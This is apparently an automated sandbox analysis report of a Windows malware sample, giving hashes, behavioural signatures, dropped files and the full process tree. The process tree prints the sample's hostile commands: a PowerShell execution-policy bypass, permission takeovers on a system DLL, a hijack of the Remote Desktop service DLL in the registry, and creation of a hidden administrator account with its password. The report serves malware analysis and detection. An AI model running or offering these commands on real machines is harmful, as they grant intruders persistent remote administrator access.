Analysis
-
max time kernel
122s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
09-03-2022 15:18
Static task
static1
Behavioral task
behavioral1
Sample
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
Resource
win10v2004-en-20220112
General
-
Target
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
-
Size
2.2MB
-
MD5
f8c8ebd884d22e0866c217d24c16042f
-
SHA1
0b9a6f2e1d735dae6f979c4bb357b565614b721d
-
SHA256
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba
-
SHA512
3114b0e3984f6d566378a7dcda39ab6f48da57b71462f283e28d94e980b85d93f5a4e84ab74e3a83e90f8f148a768684fd45585fd7844207f448baeb93bc4787
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2956 takeown.exe 1868 icacls.exe 532 icacls.exe 1316 icacls.exe 628 icacls.exe 2212 icacls.exe 3224 icacls.exe 2628 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Windows\Help\servicedll.dll upx C:\Windows\Help\lababa.bin upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 3 IoCs
Processes:
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exepid process 3924 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe 764 764 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2628 icacls.exe 2956 takeown.exe 1868 icacls.exe 532 icacls.exe 1316 icacls.exe 628 icacls.exe 2212 icacls.exe 3224 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\servicedll.dll powershell.exe File created C:\Windows\help\lababa.bin powershell.exe File created C:\Windows\help\portable.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 1492 powershell.exe 1492 powershell.exe 1492 powershell.exe 1492 powershell.exe 1492 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 656 656 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 1492 powershell.exe Token: SeRestorePrivilege 532 icacls.exe -
Suspicious use of WriteProcessMemory 52 IoCs
Processes:
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.execmd.exewscript.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3924 wrote to memory of 2088 3924 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe cmd.exe PID 3924 wrote to memory of 2088 3924 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe cmd.exe PID 2088 wrote to memory of 3944 2088 cmd.exe wscript.exe PID 2088 wrote to memory of 3944 2088 cmd.exe wscript.exe PID 3944 wrote to memory of 3444 3944 wscript.exe cmd.exe PID 3944 wrote to memory of 3444 3944 wscript.exe cmd.exe PID 3444 wrote to memory of 1492 3444 cmd.exe powershell.exe PID 3444 wrote to memory of 1492 3444 cmd.exe powershell.exe PID 1492 wrote to memory of 2956 1492 powershell.exe takeown.exe PID 1492 wrote to memory of 2956 1492 powershell.exe takeown.exe PID 1492 wrote to memory of 1868 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 1868 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 532 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 532 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 1316 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 1316 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 628 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 628 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 2212 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 2212 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 3224 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 3224 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 2628 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 2628 1492 powershell.exe icacls.exe PID 1492 wrote to memory of 1068 1492 powershell.exe reg.exe PID 1492 wrote to memory of 1068 1492 powershell.exe reg.exe PID 1492 wrote to memory of 2436 1492 powershell.exe net.exe PID 1492 wrote to memory of 2436 1492 powershell.exe net.exe PID 2436 wrote to memory of 2420 2436 net.exe net1.exe PID 2436 wrote to memory of 2420 2436 net.exe net1.exe PID 540 wrote to memory of 1040 540 cmd.exe net.exe PID 540 wrote to memory of 1040 540 cmd.exe net.exe PID 1040 wrote to memory of 3820 1040 net.exe net1.exe PID 1040 wrote to memory of 3820 1040 net.exe net1.exe PID 1492 wrote to memory of 4068 1492 powershell.exe cmd.exe PID 1492 wrote to memory of 4068 1492 powershell.exe cmd.exe PID 3420 wrote to memory of 3140 3420 cmd.exe net.exe PID 3420 wrote to memory of 3140 3420 cmd.exe net.exe PID 3140 wrote to memory of 1268 3140 net.exe net1.exe PID 3140 wrote to memory of 1268 3140 net.exe net1.exe PID 1660 wrote to memory of 3080 1660 cmd.exe net.exe PID 1660 wrote to memory of 3080 1660 cmd.exe net.exe PID 3080 wrote to memory of 3860 3080 net.exe net1.exe PID 3080 wrote to memory of 3860 3080 net.exe net1.exe PID 3880 wrote to memory of 1560 3880 cmd.exe net.exe PID 3880 wrote to memory of 1560 3880 cmd.exe net.exe PID 1560 wrote to memory of 3400 1560 net.exe net1.exe PID 1560 wrote to memory of 3400 1560 net.exe net1.exe PID 3316 wrote to memory of 3388 3316 cmd.exe net.exe PID 3316 wrote to memory of 3388 3316 cmd.exe net.exe PID 3388 wrote to memory of 1572 3388 net.exe net1.exe PID 3388 wrote to memory of 1572 3388 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe"C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\reactor.txt reactor.ps1& powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps15⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\servicedll.dll /f6⤵
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f6⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc rmIwnxuF /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc rmIwnxuF /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc rmIwnxuF /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc rmIwnxuF1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc rmIwnxuF2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc rmIwnxuF3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\9887742.txtMD5
f63cb26ded5c82a6c82e5160933da4ed
SHA19ae96ecea3c6c56a6e67e672cf9422d7427c04ff
SHA2567788a48c713d87538bedf7907733b03eb72d3682004b4d1795d0e6eb1b494f4c
SHA512985cbe9af1b9539eb5b67eef4b78bd7581247f3a4b7e4c3ecd6ced3694d9c56814dfd9a866797aa3edeebe68dc07f35513fd62b804d5a0c5699288c9b37adbab
-
C:\Users\Admin\AppData\Local\Temp\changelog_66663.txtMD5
a97cf439052cb972928acb8d809f9edc
SHA12bb935b6b2cf883315eacf3efec2b94bc1054961
SHA2569fed878f994d4778d1ee922ee0c7478cadfb16a119aa93e4e3e8fa555e9d4547
SHA512e861d95e20fd989080349e2257604fde204fda4090fac9d0f2fc413efc7731855a66b0342b902e373908fccb9f85f6777bcf1530d585d6e5bdfdd64e1809c907
-
C:\Users\Admin\AppData\Local\Temp\changes_765543.txtMD5
4a6f27efae09ab64d0735d1c10d79b3e
SHA18d72ddb83235b8b8632e7e9f8df91f566d3c73c6
SHA2560516aa8b986ed03badaf0c7a0db833ab64437900d82a833e22ca4d2715bfc58f
SHA512df1ef0fe044bb6c6e37b07676851cca3b0a849e52e8bfee79e04c0af1d5383862d5e9e17ab5e1c102d31caec84fbf9afa4121c2f89453c21aac8aebd761524b4
-
C:\Users\Admin\AppData\Local\Temp\install_455111.logMD5
0c34e2096fc530535d1fb38b8e9f68a6
SHA1ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA5120b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
C:\Users\Admin\AppData\Local\Temp\log_455111.txtMD5
2c50ffba8c7d98a9cb5fec3c2a6913df
SHA1849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA5127d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
C:\Users\Admin\AppData\Local\Temp\nsa7067.tmp\System.dllMD5
fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
C:\Users\Admin\AppData\Local\Temp\reactor.txtMD5
c2a9670c6617c3acc5cc5099b1437e42
SHA16a83468dcaf55f74cd46fdf280ed8f354e6d93eb
SHA256c5b725434a92709e3bf65d44b5cb25712a2140141facb54396e25b29933c7b95
SHA512d2c789f800cae8420b36380155a5d1566b7bed9f2a609b739dee4d20064e7770efd48303000f0ee6aa79340d73b7557223af885ffc78aa32a7c372d04e2903a1
-
C:\Users\Admin\AppData\Local\Temp\reactor.vbsMD5
c0a65d8cb9b5db7fdc9a178f8c80102d
SHA1733f50a72526784a61aaf77e5cddf13f904c1693
SHA256a55d04242cc9381741621d2918accce8fb9c4b8307013c9f828cacdd1d4895c2
SHA51236dc712d8a926c6a7bc4257345261ea0b7154daa97735123007e903cdb732ebf2fe0c3358f00b6b500cdccceecbc130cbc3f4a2a2a4f09974bcca8dc93ed4539
-
C:\Users\Admin\AppData\Local\Temp\readme_455111.txtMD5
c1bf275bca659ad1cf0bd5c6d04cec7a
SHA1122d241329bffafc75d3e1e43e993d22d8180f41
SHA256c6e7c51172f2094e7240c3415681bd3836cf18a6260e184798986787396ed435
SHA5128a5e635ba906248406f392d9dfe9e11c5776d6c349097d641bd672968ea35a360ab7eb5062279307ba7864e44ee18f4dbc11e518a469a592fb8d18fca71baeaf
-
C:\Windows\Help\lababa.binMD5
ffa52c8fbd121f416f27f18bd2d0ad7f
SHA108255a80df87379c303fb39aabc579ef1c09b037
SHA256f61fdfc36ee70147d7639f9d2dc25dd42353652d390961b3727ea990d7ef4b05
SHA512b8db846d9a8bf8561c0f81dea143253d55f4d94543a668eb6fa47a7c86e83845c5734f6a0706a6c9a742cf7fd2dcc971ac01ea223b7270928de4b218da775cb5
-
C:\Windows\Help\servicedll.dllMD5
def5e867485841d1f2f53db3f0407514
SHA11fdfa582b37f4c0c06a998532856a89581a5fea0
SHA25625de2f4ca48b55ba403b08d94d64e97b5582fa76b51b9ac8e7bcaae111e04dfc
SHA512c470af48a66507dacf5129f0ae7d68df859443e2cb709a507fe6b23be1ff52ca9ded878adcb60997544e9227022d7dbc8bd91b89fa33a30eef8effb1d6dbaf43
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
memory/1492-146-0x0000022DFA913000-0x0000022DFA915000-memory.dmpFilesize
8KB
-
memory/1492-145-0x0000022DFA910000-0x0000022DFA912000-memory.dmpFilesize
8KB
-
memory/1492-143-0x00007FFAB0E60000-0x00007FFAB1921000-memory.dmpFilesize
10.8MB
-
memory/1492-144-0x0000022DFA916000-0x0000022DFA918000-memory.dmpFilesize
8KB
-
memory/1492-140-0x0000022DE2480000-0x0000022DE24A2000-memory.dmpFilesize
136KB